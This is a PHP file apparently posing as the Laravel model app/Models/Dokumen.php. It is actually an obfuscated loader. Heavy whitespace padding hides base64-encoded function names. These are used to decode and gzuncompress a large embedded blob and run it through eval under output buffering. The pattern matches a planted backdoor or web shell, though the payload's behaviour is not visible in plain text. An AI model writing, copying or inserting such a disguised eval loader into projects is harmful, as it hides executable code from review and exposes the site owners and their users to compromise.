<?php 
        $__='printf';$_='Loading app/Models/Dokumen.php';
        



























































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































                                                                                                                                                                                                                     $________;
